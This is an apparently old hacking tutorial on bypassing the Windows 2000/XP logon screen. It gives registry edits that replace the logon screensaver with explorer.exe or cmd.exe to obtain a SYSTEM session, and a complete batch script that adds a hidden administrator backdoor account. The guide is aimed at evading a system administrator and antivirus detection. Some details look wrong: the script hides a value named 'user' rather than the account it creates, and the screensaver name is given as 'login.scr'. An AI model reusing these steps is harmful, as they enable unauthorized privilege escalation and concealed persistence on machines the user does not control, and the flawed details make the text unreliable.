Bypass Logon Screen

bypassing the logon screen (windows 2000/xp) in windows 95, 98 , me it was possible to bypass the logon proccess by pressing the 'esc' key in the logon screen. that would vanish the logon prompt and the desktop would appear normally with only access restrictions to some folders. in windows 2000 and xp there are 2 basic groups of users. ordinary users and admin users and they can have a password or not. in case they have a password you must know it in order to login to the system, otherwise you won�t be able to access the desktop. if you have access to a user with admin priviledges then it is possible to create a recovery disk. all you have to do is insert a floopy disk in the drive and then go to start - run and type exactly as it appears bellow : rundll32 keymgr.dll,prshowsavewizardexw the above command will open the 'password recovery assistant' for you to create an emergency disk to recover possible lost passwords. actually you will not recover but will re-define it. let�s suppose you have an administrator that doesn�t permit you to have an admin account. if someday you find a local exploit for windows 2000/xp and somehow not patched on your network yet, then using the local exploit to gain admin access to the system is a nice option. but probably after some hours or days it will be patched for sure and it will no longer work. besides antivirus softwares will detect your exploit application as a type of virus so beware. after successfull exploitation, creating an user account with admin rights, even if you hide it (i will show how later) it is not a good idea because if the admin looks for it via command prompt he/she will see the created account, the date of creation etc. the best way is to alter a value in the windows registry to make it possible to bypass the logon screen. the following will happen: if you leave your computer and no one touch the mouse or keyboard by default after some minutes the screensaver is executed. the same happens if you leave the computer in the logon screen, so if you change the name of the screensaver to another application like cmd.exe or explorer.exe, instead of the screensaver, that application will be executed. now supposing you have admin access to the computer, let�s open the registry editor by clicking on 'start' - 'run' and typing regedit . the regsitry editor will open. nvigate through hkey_users\.default\control panel\desktop . in the right side of the screen change the data of the reg_sz type value called scrnsave.exe from login.scr to explorer.exe for

example. do the same thing in the other users keys: hkey_users\xxxx-xxxxx-xxxx-xxxx\control panel\desktop of letters and numbers

where xxxx is a combination

hkey_users\s-1-5-18\control panel\desktop hkey_users\s-1-5-19\control panel\desktop and also to any other key related to an specific user on the computer. the more users on the computer the more keys will exist in the root key 'hkey_users' and therefore you will have to change the scrnsave.exe value in those keys too. in case you think the time it takes to execute 'explorer.exe' is too long, you can also change the timeout. the value for the execution timeout is 'screensavetimeout' also a reg_sz type. default is 600 but you can change it for example to 100 . close regedit and reboot the computer. leave it there for some time and then when you return you should see the desktop screen just as if you had logged on normally. click on the start menu and see in the left side the name of the user... yes the user is a built-in security user called 'nt authority\system' and should have full rights on the system but actually, this method to get system will not grant you full rights to the system but it is good enough because you are able to acomplish many usefull things like accessing users folders, copying files, etc, and you could place an application in the all users startup folder. this user has a few less rights then the normal administrator and much more power then restricted users. as we are speaking of logon screen, i will provide a simple script to hide user accounts from the xp logon screen: -------------------------hiddenuserxp.cmd---------------------------------------------------------------------------------------------------@echo off echo script that will create an user with admin power and hide echo it from the windows xp welcome screen. echo beware because it is not totally hidden and system admins echo can view it in the command prompt by typing 'net user' echo username = user32 and password = userpwd pause net user user32 userpwd /add net localgroup administrators user32 /add net localgroup administradores user32 /add rem the above command is in case you have winxp in portuguese and it varies with the os language :p reg add "hklm\software\microsoft\windows

nt\currentversion\winlogon\specialaccounts\userlist" /v user /t reg_dword /d 0 /f exit --------------------------------------------------------------------------------------------------------------------------------------------save the above script as hiddenuserxp.cmd and double click it to run. notice that if you go to the control panel, then user accounts, you wont see the username 'user32' that we have just created, but if you go to the command prompt (cmd.exe) and type net user all the users including the just created one will be displayed so be carefull.